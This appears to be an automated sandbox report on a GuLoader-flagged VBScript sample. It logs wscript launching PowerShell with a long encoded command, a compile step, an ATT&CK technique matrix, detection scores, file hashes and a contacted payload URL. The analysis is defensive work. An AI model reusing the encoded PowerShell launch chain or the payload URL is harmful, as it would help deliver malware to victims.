"IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQ
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQ
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQ
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA741.tmp" "c:\Users\user\AppData\Local\Temp\nixooqy0\CSCD80281C713344E65BE3EDC717FEDF542.TMP"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_07711A68 CreateNamedPipeW,

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts11
    Command and Scripting Interpreter    		Path Interception12
    Process Injection    		1
    Masquerading    		OS Credential Dumping1
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		Exfiltration Over Other Network Medium1
    Encrypted Channel    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default Accounts221
    Scripting    		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts21
    Virtualization/Sandbox Evasion    		LSASS Memory1
    Process Discovery    		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
    Application Layer Protocol    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain Accounts2
    PowerShell    		Logon Script (Windows)Logon Script (Windows)12
    Process Injection    		Security Account Manager21
    Virtualization/Sandbox Evasion    		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
    Deobfuscate/Decode Files or Information    		NTDS1
    Application Window Discovery    		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script221
    Scripting    		LSA Secrets1
    File and Directory Discovery    		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common2
    Obfuscated Files or Information    		Cached Domain Credentials12
    System Information Discovery    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 625175 Sample: PO-19903.vbs Startdate: 12/05/2022 Architecture: WINDOWS Score: 84 22 Found malware configuration 2->22 24 Multi AV Scanner detection for submitted file 2->24 26 Yara detected GuLoader 2->26 28 2 other signatures 2->28 8 wscript.exe 2 2->8         started        process3 signatures4 30 Wscript starts Powershell (via cmd or directly) 8->30 32 Very long command line found 8->32 34 Encrypted powershell cmdline option found 8->34 11 powershell.exe 22 8->11         started        process5 process6 13 csc.exe 3 11->13         started        16 conhost.exe 11->16         started        file7 20 C:\Users\user\AppData\Local\...\nixooqy0.dll, PE32 13->20 dropped 18 cvtres.exe 1 13->18         started        process8

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    PO-19903.vbs20%ReversingLabsScript.Trojan.Valyria

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://go.micro0%URL Reputationsafe
    https://vegproworld.com/wp-content/Touchb.vbs0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://vegproworld.com/wp-content/Touchb.vbstrue
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000012.00000002.799500951.0000000004921000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      https://go.micropowershell.exe, 00000012.00000002.801078678.0000000004BC7000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown

      World Map of Contacted IPs

      No contacted IP infos

      General Information

      Joe Sandbox Version:34.0.0 Boulder Opal
      Analysis ID:625175
      Start date and time: 12/05/202213:29:192022-05-12 13:29:19 +02:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 9m 26s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:PO-19903.vbs
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:30
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal84.troj.evad.winVBS@8/9@0/0
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .vbs
      • Adjust boot time
      • Enable AMSI
      • Override analysis time to 240s for JS files taking high CPU consumption

      Warnings

      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
      • Excluded IPs from analysis (whitelisted): 23.211.6.115
      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, fs.microsoft.com, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      13:33:25API Interceptor33x Sleep call for process: powershell.exe modified

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASNs

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Temp\OVER.dat

      Download File
      Process:C:\Windows\System32\wscript.exe
      File Type:data
      Category:dropped
      Size (bytes):59179
      Entropy (8bit):7.382148699631125
      Encrypted:false
      SSDEEP:1536:h+3+oNMsrhj0KX8PR8u6DXwceBy0SE9trLu:Y+NuhQzJ8xrVf0bfLu
      MD5:DD9476AAE299F8CD938C0948F1F1C984
      SHA1:CB7F30DDE5A14A71FB33FDD8EDECADFBDB59F178
      SHA-256:6E63C9314D2B7EEFE27553D57326E4A39DCE0C360CDBF1E5B146C244A0E09EBA
      SHA-512:B2E5D0FC61FD41F9135960A0B1C602A3129E9C620ABC233476CFCAFAF827205A0A9E50B80920FFA1713D814C749D3D165462FD06C2EEF9F2AFA1F7A9841FDA3D
      Malicious:false
      Reputation:low
